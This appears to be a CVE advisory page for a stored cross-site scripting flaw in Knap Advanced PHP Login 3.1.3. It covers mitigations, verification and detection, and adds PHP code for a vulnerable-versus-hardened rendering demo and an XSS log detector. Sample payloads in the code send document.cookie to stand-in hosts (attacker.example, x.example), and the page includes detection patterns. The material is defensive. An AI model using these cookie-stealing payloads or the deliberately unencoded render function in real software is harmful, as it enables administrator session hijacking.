CVE-2022-50940

6.4 MEDIUM

📋 TL;DR

Knap Advanced PHP Login 3.1.3 contains a stored (persistent) cross-site scripting (XSS) vulnerability in the name parameter. A value submitted in that field is stored without validation and later rendered unencoded in backend modules, so the injected script executes in an administrator's browser when they view user or activity logs. Consequences include administrator session hijacking and phishing from within the trusted backend UI. All installations running the vulnerable version are affected.

💻 Affected Systems

Products:
  • Knap Advanced PHP Login
Versions: 3.1.3
Operating Systems: Any OS running PHP
Default Config Vulnerable: ⚠️ Yes
Notes: All installations of version 3.1.3 are vulnerable regardless of configuration.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator account compromise leading to full system takeover, data theft, or deployment of additional malware.

🟠

Likely Case

Session hijacking of administrators, credential theft via phishing, or defacement of backend interfaces.

🟢

If Mitigated

Limited impact once the name parameter is validated on input and encoded on output; until both are in place, any backend module that renders the stored name remains exposed.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an account: the attacker registers (or otherwise creates a user) with the payload in the name parameter, then waits for an administrator to open a backend module that renders that user's name or activity entries. No interaction beyond normal admin browsing is needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: https://laravel-vuejs.com/

Restart Required: No

Instructions:

1. Check the vendor website for an updated version (no fixed release is confirmed here; patch version unknown).
2. If one is available, download it and replace the vulnerable files.
3. Test registration and the backend user/activity log views after the update.

🔧 Temporary Workarounds

Input Validation and Sanitization

Applies to: all

Add server-side validation of the name parameter before storage: enforce a length limit and an allowed-character whitelist (for example with preg_match() or filter_var()), and reject submissions that fail. Treat this as a defence-in-depth control, not the fix on its own; stripping or encoding on input alone is unreliable because the stored value may reach several output contexts.

Output Encoding

Applies to: all

Encode all user-controlled data at the point where it is rendered in backend modules. For HTML body and attribute contexts use htmlspecialchars() with ENT_QUOTES | ENT_SUBSTITUTE and an explicit 'UTF-8' charset (htmlentities() with the same flags also works); for values placed inside JavaScript use json_encode() rather than HTML encoding.
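The two workarounds above, shown side by side as an added example. This is not Knap's code; the function names, the user array layout and the sample payload are all hypothetical, constructed to show the vulnerable pattern (a stored name echoed verbatim into an admin page) next to the hardened version (whitelist validation at registration, htmlspecialchars() at output). Requires the mbstring extension for mb_strlen().

```php
<?php
// Added example, not from Knap Advanced PHP Login. Names and data are hypothetical.
declare(strict_types=1);

// --- Vulnerable pattern: the stored "name" goes straight into the admin HTML ---
function renderUserRowVulnerable(array $user): string
{
    // Whatever was submitted at registration is emitted verbatim, so a stored
    // <script> payload runs in the administrator's browser.
    return "<tr><td>{$user['id']}</td><td>{$user['name']}</td></tr>";
}

// --- Hardened: validate on input, encode on output ---

// Registration-time validation: bound the length and allow only characters a
// display name needs. Returns null when the value must be rejected.
function validateDisplayName(string $name): ?string
{
    $name = trim($name);
    if ($name === '' || mb_strlen($name, 'UTF-8') > 64) {
        return null;
    }
    // Letters in any script, digits, space, dot, apostrophe and hyphen only.
    if (!preg_match('/^[\p{L}\p{N} .\'-]+$/u', $name)) {
        return null;
    }
    return $name;
}

// Output encoding for HTML element and quoted-attribute contexts. This is the
// control that actually stops a stored payload from executing.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderUserRowHardened(array $user): string
{
    return '<tr><td>' . e((string) $user['id']) . '</td><td>' . e($user['name']) . '</td></tr>';
}

// Constructed sample payload of the kind submitted in the registration "name" field.
$payload = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';
$user = ['id' => 42, 'name' => $payload];

echo "Vulnerable row:\n" . renderUserRowVulnerable($user) . "\n\n";
echo "Hardened row:\n" . renderUserRowHardened($user) . "\n\n";

// The registration-time check rejects the payload but accepts an ordinary name.
var_dump(validateDisplayName($payload));
var_dump(validateDisplayName("Ana María O'Neil"));
```

Run it with `php example.php`: the hardened row contains the payload as inert text (`&lt;script&gt;...`), while the vulnerable row reproduces the script tag intact. Note that e() is only correct for HTML body and quoted-attribute output; a name interpolated into inline JavaScript or a URL needs json_encode() or rawurlencode() respectively.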

🧯 If You Can't Patch

  • Restrict access to backend modules to trusted IP addresses only; the payload still executes, but only an administrator who can reach the backend is exposed.
  • Add web application firewall (WAF) rules to block XSS payloads in the name parameter on the registration endpoint. Treat this as a stopgap: filter evasion through encoding, case variation and attribute-based payloads is routine, so also log and alert on matches rather than relying on the block alone.

🔍 How to Verify

Check if Vulnerable:

Check if running Knap Advanced PHP Login version 3.1.3 by examining version files or configuration.

Check Version:

grep -r 'version' /path/to/knap/installation/ or check config files

Verify Fix Applied:

In a test environment, register a user with a harmless marker in the name field (for example a bare <b>test</b> tag or an alert-free string) and open the backend user and activity log views: the fix is applied only if the marker is displayed as literal text rather than rendered.

📡 Detection & Monitoring

Log Indicators:

  • Unusually long name values in user registration records
  • HTML tags, event-handler attributes (onerror=, onload=) or javascript: URLs in the name field, including URL- or entity-encoded forms

Network Indicators:

  • POST requests with script tags in name parameter to registration endpoints

SIEM Query:

source="web_logs" AND (name="*<script>*" OR name="*javascript:*")

This query only sees the name value if the application (or a proxy/WAF that records request bodies) logs it; standard web-server access logs do not contain POST bodies. Extend the pattern list beyond a literal <script>, since encoded and attribute-based payloads will not match it.
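The detection logic above, as an added example rather than anything from the original page or the vendor. It assumes an application log that records the submitted name as a quoted `name="..."` field (hypothetical format; the sample lines are constructed), decodes URL and entity encoding before matching, and flags the oversize-name indicator as well as tag, event-handler and javascript: patterns. Requires the mbstring extension.

```php
<?php
// Added example, not from Knap Advanced PHP Login. Log format and data are constructed.
declare(strict_types=1);

// Indicators broader than a literal "<script>": any tag, inline event handlers,
// javascript: URLs, and encoded angle brackets that survive in the raw value.
const XSS_PATTERNS = [
    'tag'           => '/<\s*\/?\s*[a-z][^>]*>/i',
    'event_handler' => '/\bon[a-z]+\s*=/i',
    'js_url'        => '/javascript\s*:/i',
    'encoded_tag'   => '/(%3C|&lt;|&#x3c;|&#60;)/i',
];

const MAX_NAME_LEN = 64;

/** Extract a quoted key="value" field from a log line; null if absent. */
function extractField(string $line, string $field): ?string
{
    $re = '/\b' . preg_quote($field, '/') . '="((?:[^"\\\\]|\\\\.)*)"/';
    if (preg_match($re, $line, $m)) {
        return stripslashes($m[1]);
    }
    return null;
}

/** Return the indicator names that fire for one log line (empty = benign). */
function inspectName(string $line): array
{
    $raw = extractField($line, 'name');
    if ($raw === null) {
        return [];
    }
    // Match against the raw value and its decoded forms so that
    // %3Cscript%3E and &lt;script&gt; are seen as <script>.
    $candidates = [$raw, urldecode($raw), html_entity_decode($raw, ENT_QUOTES, 'UTF-8')];
    $hits = [];
    foreach (XSS_PATTERNS as $label => $re) {
        foreach ($candidates as $c) {
            if (preg_match($re, $c)) {
                $hits[] = $label;
                break;
            }
        }
    }
    if (mb_strlen($raw, 'UTF-8') > MAX_NAME_LEN) {
        $hits[] = 'oversize_name';
    }
    return $hits;
}

// Constructed sample application log lines (not real traffic).
$lines = [
    '2022-11-02T10:14:05Z POST /register ip=203.0.113.7 name="alice" status=200',
    '2022-11-02T10:15:31Z POST /register ip=203.0.113.9 name="<script>fetch(\'//x.example/?\'+document.cookie)</script>" status=200',
    '2022-11-02T10:16:02Z POST /register ip=203.0.113.9 name="%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" status=200',
    '2022-11-02T10:17:44Z POST /register ip=198.51.100.4 name="Bob O\'Brien" status=200',
    '2022-11-02T10:18:10Z POST /register ip=198.51.100.5 name="' . str_repeat('A', 120) . '" status=200',
];

foreach ($lines as $line) {
    $hits = inspectName($line);
    printf("%-6s %s\n", $hits ? 'ALERT' : 'ok', $hits ? implode(',', $hits) : substr($line, 0, 60));
}
```

Run with `php detect.php`. The second and third sample lines trigger the tag indicators (the third only because of the urldecode() pass), the last trips the length check, and the two ordinary names pass. The event-handler pattern is deliberately loose and will occasionally match benign text such as a name beginning with "on" followed by "="; tune it against your own registration volume before alerting on it.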
